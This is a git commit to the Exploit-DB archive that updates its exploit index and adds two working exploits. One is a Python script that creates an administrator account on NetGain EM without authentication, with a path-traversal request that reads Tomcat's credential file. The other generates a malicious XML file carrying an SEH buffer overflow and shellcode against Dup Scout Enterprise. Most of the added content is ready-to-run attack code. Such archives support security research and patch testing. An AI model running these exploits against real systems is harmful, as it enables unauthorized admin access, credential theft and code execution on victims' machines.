DB: 2017-05-25

2 new exploits

Microsoft Windows XP - Keyboard Layouts Pool Corruption LPE (PoC) (MS12-034)
Microsoft Windows XP - Keyboard Layouts Pool Corruption (PoC) (MS12-034)

Microsoft Internet Explorer 6 - HtmlDlgSafeHelper Remote Denial of Service
Microsoft Internet Explorer 6 - 'HtmlDlgSafeHelper' Remote Denial of Service

Dup Scout Enterprise 9.7.18 - '.xml' Local Buffer Overflow

NetGain EM 7.2.647 build 941 - Authentication Bypass / Local File Inclusion
This commit is contained in:
Offensive Security 2017-05-25 05:01:17 +00:00
parent 2907a841a7
commit 07c41df34d
3 changed files with 186 additions and 2 deletions

View file

@ -2200,7 +2200,7 @@ id,file,description,date,author,platform,type,port
18878,platforms/windows/dos/18878.txt,"Pro-face Pro-Server EX WinGP PC Runtime - Multiple Vulnerabilities",2012-05-14,"Luigi Auriemma",windows,dos,0
18890,platforms/multiple/dos/18890.txt,"Java - Trigerring Java Code from a .SVG Image",2012-05-16,"Nicolas Gregoire",multiple,dos,0
18909,platforms/php/dos/18909.php,"PHP 5.4.3 - wddx_serialize_* / stream_bucket_* Variant Object Null Ptr Dereference",2012-05-21,condis,php,dos,0
18894,platforms/windows/dos/18894.txt,"Microsoft Windows XP - Keyboard Layouts Pool Corruption LPE (PoC) (MS12-034)",2012-05-18,Cr4sh,windows,dos,0
18894,platforms/windows/dos/18894.txt,"Microsoft Windows XP - Keyboard Layouts Pool Corruption (PoC) (MS12-034)",2012-05-18,Cr4sh,windows,dos,0
18902,platforms/windows/dos/18902.rb,"Real-DRAW PRO 5.2.4 - Import File Crash",2012-05-21,"Ahmed Elhady Mohamed",windows,dos,0
18903,platforms/windows/dos/18903.rb,"DVD-Lab Studio 1.25 - '.DAL' File Open Crash",2012-05-21,"Ahmed Elhady Mohamed",windows,dos,0
18910,platforms/php/dos/18910.php,"PHP 5.4.3 - (com_event_sink) Denial of Service",2012-05-21,condis,php,dos,0
@ -3586,7 +3586,7 @@ id,file,description,date,author,platform,type,port
28194,platforms/windows/dos/28194.txt,"Microsoft Internet Explorer 6 - RDS.DataControl Denial of Service",2006-07-08,hdm,windows,dos,0
28196,platforms/windows/dos/28196.txt,"Microsoft Internet Explorer 6 - DirectAnimation.DAUserData Denial of Service",2006-07-08,hdm,windows,dos,0
28197,platforms/windows/dos/28197.txt,"Microsoft Internet Explorer 6 - Object.Microsoft.DXTFilter Denial of Service",2006-07-09,hdm,windows,dos,0
28202,platforms/windows/dos/28202.txt,"Microsoft Internet Explorer 6 - HtmlDlgSafeHelper Remote Denial of Service",2006-07-10,hdm,windows,dos,0
28202,platforms/windows/dos/28202.txt,"Microsoft Internet Explorer 6 - 'HtmlDlgSafeHelper' Remote Denial of Service",2006-07-10,hdm,windows,dos,0
28207,platforms/windows/dos/28207.txt,"Microsoft Internet Explorer 6 - TriEditDocument Denial of Service",2006-07-11,hdm,windows,dos,0
28213,platforms/windows/dos/28213.txt,"Microsoft Internet Explorer 6 - RevealTrans Denial of Service",2006-07-12,hdm,windows,dos,0
28220,platforms/linux/dos/28220.txt,"KDE Konqueror 3.5.x - ReplaceChild Denial of Service",2006-07-14,hdm,linux,dos,0
@ -9008,6 +9008,7 @@ id,file,description,date,author,platform,type,port
42020,platforms/windows/local/42020.cpp,"Microsoft Windows - COM Aggregate Marshaler/IRemUnknown2 Type Confusion Privilege Escalation",2017-05-17,"Google Security Research",windows,local,0
42045,platforms/linux/local/42045.c,"VMware Workstation for Linux 12.5.2 build-4638234 - ALSA Config Host Root Privilege Escalation",2017-05-22,"Google Security Research",linux,local,0
42053,platforms/linux/local/42053.c,"KDE 4/5 - 'KAuth' Privilege Escalation",2017-05-18,Stealth,linux,local,0
42059,platforms/windows/local/42059.py,"Dup Scout Enterprise 9.7.18 - '.xml' Local Buffer Overflow",2017-05-24,ScrR1pTK1dd13,windows,local,0
1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@ -37778,6 +37779,7 @@ id,file,description,date,author,platform,type,port
41697,platforms/linux/webapps/41697.rb,"SixApart MovableType < 5.2.12 - Storable Perl Code Execution (Metasploit)",2015-02-11,Metasploit,linux,webapps,0
41698,platforms/linux/webapps/41698.rb,"WordPress Theme Holding Pattern - Arbitrary File Upload (Metasploit)",2015-02-11,Metasploit,linux,webapps,0
41714,platforms/windows/webapps/41714.rb,"Distinct TFTP 3.10 - Writable Directory Traversal Execution (Metasploit)",2012-04-08,Metasploit,windows,webapps,0
42058,platforms/jsp/webapps/42058.py,"NetGain EM 7.2.647 build 941 - Authentication Bypass / Local File Inclusion",2017-05-24,f3ci,jsp,webapps,0
41899,platforms/multiple/webapps/41899.html,"Apple WebKit / Safari 10.0.2(12602.3.12.0.1) - 'PrototypeMap::createEmptyStructure' Universal Cross-Site Scripting",2017-04-20,"Google Security Research",multiple,webapps,0
41716,platforms/php/webapps/41716.txt,"Gr8 Tutorial Script - SQL Injection",2017-03-24,"Ihsan Sencan",php,webapps,0
41717,platforms/php/webapps/41717.txt,"Gr8 Gallery Script - SQL Injection",2017-03-24,"Ihsan Sencan",php,webapps,0

Can't render this file because it is too large.

122
platforms/jsp/webapps/42058.py Executable file
View file

@ -0,0 +1,122 @@
'''
# Exploit Title: Add User Account with Admin Privilege without Login & Local File Inclusion
# Date: 2017-05-21
# Exploit Author: f3ci
# Vendor Homepage: http://www.netgain-systems.com
# Software Link: http://www.netgain-systems.com/free-edition-download/
# Version: <= v7.2.647 build 941
# Tested on: Windows 7
Add User Account with Admin Privilege without Login
----------------------------------------------
We can create user and give admin privilege to user which we have made
without login.
Because this app does not check the session on this request
Local File Inclusion
----------------------------------------------
Normal Request:
POST /u/jsp/log/download_do.jsp HTTP/1.1
Host: 192.168.0.21:8081
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:45.0) Gecko/20100101
Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.0.21:8081/u/index.jsp
Cookie: JSESSIONID=8A172EB8DDBD08D1E6D25A1CE8CC74AC
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 18
filename=iossd.log
We can download another file with change value on filename parameter and
also we can send this request without login.
Example:
POST /u/jsp/log/download_do.jsp HTTP/1.1
Host: 192.168.0.21:8081
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:45.0) Gecko/20100101
Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.0.21:8081/u/index.jsp
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 18
filename=../../tomcat/conf/tomcat-users.xml
'''
#!/usr/local/bin/python
# Exploit Title: Add User Account with Admin Privilege without Login
# Date: 2017-05-21
# Exploit Author: f3ci
# Vendor Homepage: http://www.netgain-systems.com
# Software Link: http://www.netgain-systems.com/free-edition-download/
# Version: <= v7.2.647 build 941
# Tested on: Windows 7
import requests
import sys
try:
def create():
ip = str(sys.argv[1])
port = str(sys.argv[2])
user = str(sys.argv[3])
passwd = str(sys.argv[4])
print "\033[1;32m[+]\033[1;m Try to Create user"
url="http://"+ip+":"+port+"/u/jsp/security/user_save_do.jsp"
data= {
'new': "true",
'id': "",
'name': user,
'dname': "foobar",
'password': passwd,
'password2': passwd,
'description': "",
'emails': "foo@bar.com",
'mobileNumber': "000000",
'loginAttempts': "5",
}
response = requests.post(url, data=data)
status = response.status_code
if status == 200:
print "\033[1;32m[+]\033[1;m Success!!"
role()
else:
print "\033[91m[-]\033[91;m Create User Failed"
def role():
ip = str(sys.argv[1])
port = str(sys.argv[2])
user = str(sys.argv[3])
passwd = str(sys.argv[4])
print "\033[1;32m[+]\033[1;m Get admin role"
url="http://"+ip+":"+port+"/u/jsp/security/role_save_do.jsp"
data= {
'name': "admin",
'description': "Administrator",
'users': [user,"admin"],
}
response = requests.post(url, data=data)
status = response.status_code
if status == 200:
print "\033[1;32m[+]\033[1;m Success!!"
print "\033[1;32m[+]\033[1;m Login with user:" +user+ " password:" + passwd
else:
print "\033[91m[-]\033[91;m Get admin role Failed"
create();
except:
print "\033[91m[!]\033[91;m Usage: %s <IP> <port> <username> <password>" % str(sys.argv[0])
print "\033[91m[!]\033[91;m Ex: %s 127.0.0.1 8081 foobar passw0rd" % str(sys.argv[0])

View file

@ -0,0 +1,60 @@
author = '''
##############################################
# Created: ScrR1pTK1dd13 #
# Name: Greg Priest #
# Mail: ScR1pTK1dd13.slammer@gmail.com #
##############################################
# Exploit Title: Dup Scout Enterprise v9.7.18 Import Local Buffer Overflow Vuln.(SEH)
# Date: 2017.05.24
# Exploit Author: Greg Priest
# Version: Dup Scout Enterprise v9.7.18
# Tested on: Windows7 x64 HUN/ENG Professional
'''
import os
import struct
overflow = "A" * 1536
jmp_esp = "\x94\x21\x1C\x65"
#651F20E5
#651F214E
#652041ED
nop = "\x90" * 16
esp = "\x8D\x44\x24\x4A"
jmp = "\xFF\xE0"
nop2 = "\x90" * 70
nSEH = "\x90\x90\xEB\x05"
SEH = "\x80\x5F\x1C\x90"
#"\x80\x5F\x1C\x65"
#6508F78D
#650E129F
#651C5F80
shellcode =(
"\x31\xdb\x64\x8b\x7b\x30\x8b\x7f" +
"\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b" +
"\x77\x20\x8b\x3f\x80\x7e\x0c\x33" +
"\x75\xf2\x89\xc7\x03\x78\x3c\x8b" +
"\x57\x78\x01\xc2\x8b\x7a\x20\x01" +
"\xc7\x89\xdd\x8b\x34\xaf\x01\xc6" +
"\x45\x81\x3e\x43\x72\x65\x61\x75" +
"\xf2\x81\x7e\x08\x6f\x63\x65\x73" +
"\x75\xe9\x8b\x7a\x24\x01\xc7\x66" +
"\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7" +
"\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9" +
"\xb1\xff\x53\xe2\xfd\x68\x63\x61" +
"\x6c\x63\x89\xe2\x52\x52\x53\x53" +
"\x53\x53\x53\x53\x52\x53\xff\xd7")
crash = overflow+jmp_esp+nop+esp+jmp+nop2+nSEH+SEH+"\x90" * 10+shellcode
evil = '<?xml version="1.0" encoding="UTF-8"?>\n<classify\nname=\'' + crash + '\n</classify>'
exploit = open('Ev1l.xml', 'w')
exploit.write(evil)
exploit.close()
print "Ev1l.xml raedy!"